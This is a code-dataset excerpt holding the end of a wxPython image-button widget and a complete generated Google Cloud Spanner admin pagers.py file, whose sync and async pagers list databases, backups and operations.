""" Called when the selected state of the widget is changed. """
if selected:
for control in self.GetParent().GetChildren():
if hasattr(control, '__tag__'):
if control.Selected():
control.Selected(False)
break
self.Refresh()
return
#### wx event handlers ####################################################
def _on_enter_window(self, event):
""" Called when the mouse enters the widget. """
if self._selected is not None:
self._mouse_over = True
self.Refresh()
return
def _on_leave_window(self, event):
""" Called when the mouse leaves the widget. """
if self._mouse_over:
self._mouse_over = False
self.Refresh()
return
def _on_left_dclick(self, event):
""" Called when the left mouse button is double-clicked. """
#print 'left dclick'
event.Skip()
return
def _on_left_down ( self, event = None ):
""" Called when the left mouse button goes down on the widget. """
#print 'left down'
if self._selected is not None:
self.CaptureMouse()
self._button_down = True
self.Refresh()
event.Skip()
return
def _on_left_up ( self, event = None ):
""" Called when the left mouse button goes up on the widget. """
#print 'left up'
need_refresh = self._button_down
if need_refresh:
self.ReleaseMouse()
self._button_down = False
if self._selected is not None:
wdx, wdy = self.GetClientSizeTuple()
x = event.GetX()
y = event.GetY()
if (0 <= x < wdx) and (0 <= y < wdy):
if self._selected != -1:
self.Selected( True )
elif need_refresh:
self.Refresh()
return
if need_refresh:
self.Refresh()
event.Skip()
return
def _on_paint ( self, event = None ):
""" Called when the widget needs repainting. """
wdc = wx.PaintDC( self.control )
wdx, wdy = self.control.GetClientSizeTuple()
bitmap = self.bitmap
bdx = bitmap.GetWidth()
bdy = bitmap.GetHeight()
wdc.DrawBitmap( bitmap, (wdx - bdx) / 2, (wdy - bdy) / 2, True )
pens = [ self._selectedPenLight, self._selectedPenDark ]
bd = self._button_down
if self._mouse_over:
wdc.SetBrush( wx.TRANSPARENT_BRUSH )
wdc.SetPen( pens[ bd ] )
wdc.DrawLine( 0, 0, wdx, 0 )
wdc.DrawLine( 0, 1, 0, wdy )
wdc.SetPen( pens[ 1 - bd ] )
wdc.DrawLine( wdx - 1, 1, wdx - 1, wdy )
wdc.DrawLine( 1, wdy - 1, wdx - 1, wdy - 1 )
if self._selected == True:
wdc.SetBrush( wx.TRANSPARENT_BRUSH )
wdc.SetPen( pens[ bd ] )
wdc.DrawLine( 1, 1, wdx - 1, 1 )
wdc.DrawLine( 1, 1, 1, wdy - 1 )
wdc.DrawLine( 2, 2, wdx - 2, 2 )
wdc.DrawLine( 2, 2, 2, wdy - 2 )
wdc.SetPen( pens[ 1 - bd ] )
wdc.DrawLine( wdx - 2, 2, wdx - 2, wdy - 1 )
wdc.DrawLine( 2, wdy - 2, wdx - 2, wdy - 2 )
wdc.DrawLine( wdx - 3, 3, wdx - 3, wdy - 2 )
wdc.DrawLine( 3, wdy - 3, wdx - 3, wdy - 3 )
return
#### EOF ######################################################################
| [
"[email protected]"
] | |
53f1e2f513a9735af030b686847f828c7d25a6f9 | eb9c3dac0dca0ecd184df14b1fda62e61cc8c7d7 | /google/spanner/admin/database/v1/admin-database-v1-py/google/cloud/spanner_admin_database_v1/services/database_admin/pagers.py | 77fee41bb742a42304fa72cb45903814dd541b52 | [
"Apache-2.0"
] | permissive | Tryweirder/googleapis-gen | 2e5daf46574c3af3d448f1177eaebe809100c346 | 45d8e9377379f9d1d4e166e80415a8c1737f284d | refs/heads/master | 2023-04-05T06:30:04.726589 | 2021-04-13T23:35:20 | 2021-04-13T23:35:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 21,767 | py | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from typing import Any, AsyncIterable, Awaitable, Callable, Iterable, Sequence, Tuple, Optional
from google.cloud.spanner_admin_database_v1.types import backup
from google.cloud.spanner_admin_database_v1.types import spanner_database_admin
from google.longrunning import operations_pb2 as operations # type: ignore
class ListDatabasesPager:
"""A pager for iterating through ``list_databases`` requests.
This class thinly wraps an initial
:class:`google.cloud.spanner_admin_database_v1.types.ListDatabasesResponse` object, and
provides an ``__iter__`` method to iterate through its
``databases`` field.
If there are more pages, the ``__iter__`` method will make additional
``ListDatabases`` requests and continue to iterate
through the ``databases`` field on the
corresponding responses.
All the usual :class:`google.cloud.spanner_admin_database_v1.types.ListDatabasesResponse`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(self,
method: Callable[..., spanner_database_admin.ListDatabasesResponse],
request: spanner_database_admin.ListDatabasesRequest,
response: spanner_database_admin.ListDatabasesResponse,
*,
metadata: Sequence[Tuple[str, str]] = ()):
"""Instantiate the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.cloud.spanner_admin_database_v1.types.ListDatabasesRequest):
The initial request object.
response (google.cloud.spanner_admin_database_v1.types.ListDatabasesResponse):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = spanner_database_admin.ListDatabasesRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
def pages(self) -> Iterable[spanner_database_admin.ListDatabasesResponse]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = self._method(self._request, metadata=self._metadata)
yield self._response
def __iter__(self) -> Iterable[spanner_database_admin.Database]:
for page in self.pages:
yield from page.databases
def __repr__(self) -> str:
return '{0}<{1!r}>'.format(self.__class__.__name__, self._response)
class ListDatabasesAsyncPager:
"""A pager for iterating through ``list_databases`` requests.
This class thinly wraps an initial
:class:`google.cloud.spanner_admin_database_v1.types.ListDatabasesResponse` object, and
provides an ``__aiter__`` method to iterate through its
``databases`` field.
If there are more pages, the ``__aiter__`` method will make additional
``ListDatabases`` requests and continue to iterate
through the ``databases`` field on the
corresponding responses.
All the usual :class:`google.cloud.spanner_admin_database_v1.types.ListDatabasesResponse`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(self,
method: Callable[..., Awaitable[spanner_database_admin.ListDatabasesResponse]],
request: spanner_database_admin.ListDatabasesRequest,
response: spanner_database_admin.ListDatabasesResponse,
*,
metadata: Sequence[Tuple[str, str]] = ()):
"""Instantiate the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.cloud.spanner_admin_database_v1.types.ListDatabasesRequest):
The initial request object.
response (google.cloud.spanner_admin_database_v1.types.ListDatabasesResponse):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = spanner_database_admin.ListDatabasesRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
async def pages(self) -> AsyncIterable[spanner_database_admin.ListDatabasesResponse]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = await self._method(self._request, metadata=self._metadata)
yield self._response
def __aiter__(self) -> AsyncIterable[spanner_database_admin.Database]:
async def async_generator():
async for page in self.pages:
for response in page.databases:
yield response
return async_generator()
def __repr__(self) -> str:
return '{0}<{1!r}>'.format(self.__class__.__name__, self._response)
class ListBackupsPager:
"""A pager for iterating through ``list_backups`` requests.
This class thinly wraps an initial
:class:`google.cloud.spanner_admin_database_v1.types.ListBackupsResponse` object, and
provides an ``__iter__`` method to iterate through its
``backups`` field.
If there are more pages, the ``__iter__`` method will make additional
``ListBackups`` requests and continue to iterate
through the ``backups`` field on the
corresponding responses.
All the usual :class:`google.cloud.spanner_admin_database_v1.types.ListBackupsResponse`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(self,
method: Callable[..., backup.ListBackupsResponse],
request: backup.ListBackupsRequest,
response: backup.ListBackupsResponse,
*,
metadata: Sequence[Tuple[str, str]] = ()):
"""Instantiate the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.cloud.spanner_admin_database_v1.types.ListBackupsRequest):
The initial request object.
response (google.cloud.spanner_admin_database_v1.types.ListBackupsResponse):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = backup.ListBackupsRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
def pages(self) -> Iterable[backup.ListBackupsResponse]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = self._method(self._request, metadata=self._metadata)
yield self._response
def __iter__(self) -> Iterable[backup.Backup]:
for page in self.pages:
yield from page.backups
def __repr__(self) -> str:
return '{0}<{1!r}>'.format(self.__class__.__name__, self._response)
class ListBackupsAsyncPager:
"""A pager for iterating through ``list_backups`` requests.
This class thinly wraps an initial
:class:`google.cloud.spanner_admin_database_v1.types.ListBackupsResponse` object, and
provides an ``__aiter__`` method to iterate through its
``backups`` field.
If there are more pages, the ``__aiter__`` method will make additional
``ListBackups`` requests and continue to iterate
through the ``backups`` field on the
corresponding responses.
All the usual :class:`google.cloud.spanner_admin_database_v1.types.ListBackupsResponse`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(self,
method: Callable[..., Awaitable[backup.ListBackupsResponse]],
request: backup.ListBackupsRequest,
response: backup.ListBackupsResponse,
*,
metadata: Sequence[Tuple[str, str]] = ()):
"""Instantiate the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.cloud.spanner_admin_database_v1.types.ListBackupsRequest):
The initial request object.
response (google.cloud.spanner_admin_database_v1.types.ListBackupsResponse):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = backup.ListBackupsRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
async def pages(self) -> AsyncIterable[backup.ListBackupsResponse]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = await self._method(self._request, metadata=self._metadata)
yield self._response
def __aiter__(self) -> AsyncIterable[backup.Backup]:
async def async_generator():
async for page in self.pages:
for response in page.backups:
yield response
return async_generator()
def __repr__(self) -> str:
return '{0}<{1!r}>'.format(self.__class__.__name__, self._response)
class ListDatabaseOperationsPager:
"""A pager for iterating through ``list_database_operations`` requests.
This class thinly wraps an initial
:class:`google.cloud.spanner_admin_database_v1.types.ListDatabaseOperationsResponse` object, and
provides an ``__iter__`` method to iterate through its
``operations`` field.
If there are more pages, the ``__iter__`` method will make additional
``ListDatabaseOperations`` requests and continue to iterate
through the ``operations`` field on the
corresponding responses.
All the usual :class:`google.cloud.spanner_admin_database_v1.types.ListDatabaseOperationsResponse`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(self,
method: Callable[..., spanner_database_admin.ListDatabaseOperationsResponse],
request: spanner_database_admin.ListDatabaseOperationsRequest,
response: spanner_database_admin.ListDatabaseOperationsResponse,
*,
metadata: Sequence[Tuple[str, str]] = ()):
"""Instantiate the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.cloud.spanner_admin_database_v1.types.ListDatabaseOperationsRequest):
The initial request object.
response (google.cloud.spanner_admin_database_v1.types.ListDatabaseOperationsResponse):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = spanner_database_admin.ListDatabaseOperationsRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
def pages(self) -> Iterable[spanner_database_admin.ListDatabaseOperationsResponse]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = self._method(self._request, metadata=self._metadata)
yield self._response
def __iter__(self) -> Iterable[operations.Operation]:
for page in self.pages:
yield from page.operations
def __repr__(self) -> str:
return '{0}<{1!r}>'.format(self.__class__.__name__, self._response)
class ListDatabaseOperationsAsyncPager:
"""A pager for iterating through ``list_database_operations`` requests.
This class thinly wraps an initial
:class:`google.cloud.spanner_admin_database_v1.types.ListDatabaseOperationsResponse` object, and
provides an ``__aiter__`` method to iterate through its
``operations`` field.
If there are more pages, the ``__aiter__`` method will make additional
``ListDatabaseOperations`` requests and continue to iterate
through the ``operations`` field on the
corresponding responses.
All the usual :class:`google.cloud.spanner_admin_database_v1.types.ListDatabaseOperationsResponse`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(self,
method: Callable[..., Awaitable[spanner_database_admin.ListDatabaseOperationsResponse]],
request: spanner_database_admin.ListDatabaseOperationsRequest,
response: spanner_database_admin.ListDatabaseOperationsResponse,
*,
metadata: Sequence[Tuple[str, str]] = ()):
"""Instantiate the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.cloud.spanner_admin_database_v1.types.ListDatabaseOperationsRequest):
The initial request object.
response (google.cloud.spanner_admin_database_v1.types.ListDatabaseOperationsResponse):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = spanner_database_admin.ListDatabaseOperationsRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
async def pages(self) -> AsyncIterable[spanner_database_admin.ListDatabaseOperationsResponse]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = await self._method(self._request, metadata=self._metadata)
yield self._response
def __aiter__(self) -> AsyncIterable[operations.Operation]:
async def async_generator():
async for page in self.pages:
for response in page.operations:
yield response
return async_generator()
def __repr__(self) -> str:
return '{0}<{1!r}>'.format(self.__class__.__name__, self._response)
class ListBackupOperationsPager:
"""A pager for iterating through ``list_backup_operations`` requests.
This class thinly wraps an initial
:class:`google.cloud.spanner_admin_database_v1.types.ListBackupOperationsResponse` object, and
provides an ``__iter__`` method to iterate through its
``operations`` field.
If there are more pages, the ``__iter__`` method will make additional
``ListBackupOperations`` requests and continue to iterate
through the ``operations`` field on the
corresponding responses.
All the usual :class:`google.cloud.spanner_admin_database_v1.types.ListBackupOperationsResponse`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(self,
method: Callable[..., backup.ListBackupOperationsResponse],
request: backup.ListBackupOperationsRequest,
response: backup.ListBackupOperationsResponse,
*,
metadata: Sequence[Tuple[str, str]] = ()):
"""Instantiate the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.cloud.spanner_admin_database_v1.types.ListBackupOperationsRequest):
The initial request object.
response (google.cloud.spanner_admin_database_v1.types.ListBackupOperationsResponse):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = backup.ListBackupOperationsRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
def pages(self) -> Iterable[backup.ListBackupOperationsResponse]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = self._method(self._request, metadata=self._metadata)
yield self._response
def __iter__(self) -> Iterable[operations.Operation]:
for page in self.pages:
yield from page.operations
def __repr__(self) -> str:
return '{0}<{1!r}>'.format(self.__class__.__name__, self._response)
class ListBackupOperationsAsyncPager:
"""A pager for iterating through ``list_backup_operations`` requests.
This class thinly wraps an initial
:class:`google.cloud.spanner_admin_database_v1.types.ListBackupOperationsResponse` object, and
provides an ``__aiter__`` method to iterate through its
``operations`` field.
If there are more pages, the ``__aiter__`` method will make additional
``ListBackupOperations`` requests and continue to iterate
through the ``operations`` field on the
corresponding responses.
All the usual :class:`google.cloud.spanner_admin_database_v1.types.ListBackupOperationsResponse`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(self,
method: Callable[..., Awaitable[backup.ListBackupOperationsResponse]],
request: backup.ListBackupOperationsRequest,
response: backup.ListBackupOperationsResponse,
*,
metadata: Sequence[Tuple[str, str]] = ()):
"""Instantiate the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.cloud.spanner_admin_database_v1.types.ListBackupOperationsRequest):
The initial request object.
response (google.cloud.spanner_admin_database_v1.types.ListBackupOperationsResponse):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = backup.ListBackupOperationsRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
async def pages(self) -> AsyncIterable[backup.ListBackupOperationsResponse]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = await self._method(self._request, metadata=self._metadata)
yield self._response
def __aiter__(self) -> AsyncIterable[operations.Operation]:
async def async_generator():
async for page in self.pages:
for response in page.operations:
yield response
return async_generator()
def __repr__(self) -> str:
return '{0}<{1!r}>'.format(self.__class__.__name__, self._response)
| [
"bazel-bot-development[bot]@users.noreply.github.com"
] | bazel-bot-development[bot]@users.noreply.github.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.